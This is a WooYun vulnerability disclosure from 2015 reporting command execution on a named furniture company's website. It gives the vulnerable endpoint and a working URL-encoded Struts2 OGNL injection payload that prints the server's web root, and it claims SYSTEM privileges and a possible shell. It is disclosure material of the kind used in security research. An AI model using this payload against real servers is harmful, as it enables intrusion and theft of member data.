当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108623

漏洞标题:掌上明珠家具官网命令存在可执行漏洞(已Getshell)

相关厂商:掌上明珠官网

漏洞作者: X5st

提交时间:2015-04-22 15:51

修复时间:2015-06-06 15:52

公开时间:2015-06-06 15:52

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

掌上明珠家具,中国500最具价值品牌,中国家具领导品牌。作为中国航天事业合作伙伴、中国十大家具品牌,掌上明珠始终致力于引领现代家居生活方式,产品包含套房,沙发,餐桌椅,床垫,软床等,是具有国际竞争力的家居综合服务提供商。质量方面有保证。(来源于百度百科)
官网存在命令执行漏洞,直接影响全站会员。

详细说明:

网站介绍:

http://baike.baidu.com/link?url=JT9Fdhe5EHCQyau_8IOv7vlwZ5mA4XjSfT8_UiMzoE4Zj8Pgo-sTsjh7Msej0ly40N6GClrhg6m-2uzkUfpYQa


官网url:http://www.zsmz.com
漏洞地址:http://www.zsmz.com/memberJson/sendMobileCode
存在命令执行漏洞 Exp直接爆出网站跟目录

1.png


?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D


通过检测 发现为system权限即系统权限

2.png


可以Getshell 拿数据 直接影响全站会员
未深入。。尽快修复

漏洞证明:

如上

修复方案:

你们懂得

版权声明:转载请注明来源 X5st@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2015-07-25 20:42 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    我还有这个站SQL注入,上万数据泄露呢,只是看你都忽略了, 我发不发呢

  2. 2015-07-31 21:59 | X5st ( 路人 | Rank:27 漏洞数:6 | 合伙搞世界)

    @0x 80 你自愿,厂商不鸟人·

  3. 2015-07-31 22:11 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    @X5st 那就不发了,没意思,谢谢